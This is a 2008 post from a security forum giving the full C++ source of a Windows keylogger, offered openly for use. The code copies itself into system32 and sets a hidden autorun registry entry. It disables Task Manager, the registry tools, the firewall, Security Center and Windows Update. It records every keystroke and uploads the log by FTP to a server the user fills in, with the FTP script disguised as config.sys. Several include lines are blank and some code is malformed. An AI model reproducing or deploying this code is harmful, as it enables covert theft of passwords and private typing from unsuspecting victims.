FTP Keylogger

Code:

/////////////////////////////////////////////////////////////////

// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY

// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

// [2008-07-15] FTP Keylogger

// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

// GENERATED ON: 2008-08-10 | 15:48:36

/////////////////////////////////////////////////////////////////

SOURCE CODE

#include

#include

#include

#include

using namespace std;

char BatchFile[20] = "system.bat";

char* params;

DWORD WINAPI OpenBatFile(LPVOID)

{

      for(;;) {

Sleep(300000);

ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}

}

std::string GetKey(int Key)

{

    std::string KeyString = "";

    if (Key == 8)

        KeyString = "[delete]";

    else if (Key == 13)

        KeyString = "\n";

    else if (Key == 32)

        KeyString = " ";

    else if (Key == VK_PAUSE)

        KeyString = "[PAUSE]";

    else if (Key == VK_CAPITAL)

        KeyString = "[CAPITAL]";

    else if (Key == VK_SHIFT)

        KeyString = "[SHIFT]";

    else if (Key == VK_TAB)

        KeyString = "[TABULATOR]";

    else if (Key == VK_CONTROL)

        KeyString = "[CTRL]";

    else if (Key == VK_ESCAPE)

        KeyString = "[ESCAPE]";

    else if (Key == VK_END)

        KeyString = "[END]";

    else if (Key == VK_HOME)

        KeyString = "[HOME]";

    else if (Key == VK_LEFT)

        KeyString = "[LEFT]";

    else if (Key == VK_RIGHT)

        KeyString = "[RIGHT]";

    else if (Key == VK_UP)

        KeyString = "[UP]";

    else if (Key == VK_DOWN)

        KeyString = "[DOWN]";

    else if (Key == VK_SNAPSHOT)

        KeyString = "[SNAPSHOT]";

    else if (Key == VK_NUMLOCK)

        KeyString = "[NUMLOCK]";

    else if (Key == 190 || Key == 110)

        KeyString = ".";

  

    else if (Key >=96 && Key <= 105)

        KeyString = Key-48;

    else if (Key > 47 && Key < 60)

        KeyString = Key;

    if (Key != VK_LBUTTON || Key != VK_RBUTTON)

    {

        if (Key > 64 && Key < 91)

        {

            if (GetKeyState(VK_CAPITAL))

                KeyString = Key;

            else

            {

                Key = Key + 32;

                KeyString = Key;

            }

        }

    }

    return KeyString;

}

int main()

{

    int WINAPI WinMain (HINSTANCE hThisInstance,

    HINSTANCE hPrevInstance,

    LPSTR lpszArgument,

    int nFunsterStil);

    

  char path[MAX_PATH];

  HMODULE GetModH = GetModuleHandle(NULL);

    

  char sys[MAX_PATH];

  GetModuleFileName(GetModH, path, sizeof(path));

  GetSystemDirectory(sys, sizeof(sys));

  strcat(sys, "\\borg.exe");

  CopyFile(path, sys, false);

    

  HKEY hKey, hKey2;

  

  unsigned char reg[2] = "0";

  

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );

  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));

  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);

  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));

  RegCloseKey(hKey),(hKey2);

  DeleteFile("C:\\WINDOWS\\system32\\log.txt");  

    

  ofstream FWUP;

  FWUP.open("C:\\WINDOWS\\system32\\update.bat");

  FWUP<<"@echo off\n";

  FWUP<<"net stop ""Security Center""\n";

  FWUP<<"net stop SharedAccess\n";

  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";

  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";

  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";

  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";

  FWUP<<"DEL %0\n";

  FWUP.close();  

    

  ofstream disable;

  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");

  disable<<"@echo off\n";

  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";

  disable.close();  

  

  //write ur ftp-information's here

  ofstream log;

  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");

  log<<"OPEN ftpserver\n";

  log<<"USER username\n";

  log<<"ftppassword\n";

  log<<"ASCII\n";

  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";

  log<<"BYE\n";

  log<<"exit\n";

  log.close();

  

  ofstream Ausgabe;

  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");

  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";

  Ausgabe<<"bye\n";

  Ausgabe<<"exit\n";

  Ausgabe.close();

  

  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);

  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);

  

  DWORD OpenBatch;

  

  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);

    

    std::string Filename = "C:\\WINDOWS\\system32\\log.txt";

    std::string TempString = "";

    std::fstream FStream;

    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

    while(true)

    {

        // 0% CPU

        Sleep(5);

        for(int i = 8; i < 191; i++)

        {

           if(GetAsyncKeyState(i)&1 ==1)

           {

                TempString = GetKey (i);

                FStream.write(TempString.c_str(), TempString.size());

                FStream.close();

                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

           }

        }

    }

}